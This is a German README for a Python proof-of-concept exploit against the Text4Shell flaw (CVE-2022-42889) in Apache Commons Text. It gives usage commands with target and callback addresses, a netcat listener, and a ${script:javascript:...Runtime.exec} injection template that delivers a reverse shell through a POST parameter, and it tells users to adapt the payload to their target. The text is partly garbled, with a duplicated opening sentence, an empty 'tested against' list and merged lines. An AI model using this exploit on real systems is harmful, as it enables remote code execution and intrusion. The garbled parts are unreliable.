
Ein eigens entwickelter, auf Python basierender Proof-of-Concept-Exploit (PoC), der auf Text4Shell (CVE-2022-42889) abzielt, eine kritische Schwachstelle zur Remote-Code-Ausführung in Apache Commons Text Versionen < 1.10.
Ein benutzerdefinierter, auf Python basierender Proof-of-Concept-Exploit (PoC), der auf Text4Shell (CVE-2022-42889) abzielt, eine kritische Remote-Code-Ausführungs-Schwachstelle in Apache Commons Text Versionen < 1.10.
Dieser Exploit zielt auf verwundbare Java-Anwendungen ab, die die Klasse StringSubstitutor mit aktivierter Interpolation verwenden, was die Injektion von ${script:...}-Ausdrücken ermöglicht, um beliebige Systembefehle auszuführen.
In diesem PoC wird die Ausnutzung über den Abfrageparameter data demonstriert; der Name des verwundbaren Parameters kann jedoch je nach Implementierung variieren. Benutzer sollten den Payload und den Anforderungspfad entsprechend an die Logik der Zielanwendung anpassen.
Haftungsausschluss: Dieser Exploit dient ausschließlich Bildungs- und autorisierten Penetrationstest-Zwecken. Verwenden Sie ihn verantwortungsvoll und auf eigenes Risiko.
Dies ist ein benutzerdefinierter Python3-Exploit für die Apache-Commons-Text-Schwachstelle, die als Text4Shell (CVE-2022-42889) bekannt ist. Er ermöglicht Remote-Code-Ausführung (RCE) über unsichere Interpolatoren, wenn Benutzereingaben dynamisch von StringSubstitutor ausgewertet werden.
Getestet gegen:
${script:...}python3 text4shell.py <target_ip> <callback_ip> <callback_port>
python3 text4shell.py 127.0.0.1 192.168.1.2 4444
nc -nlvp 4444
Das Skript injiziert:
${script:javascript:java.lang.Runtime.getRuntime().exec(...)}
Die Reverse Shell wird über den Parameter /data mittels einer POST-Anfrage gesendet.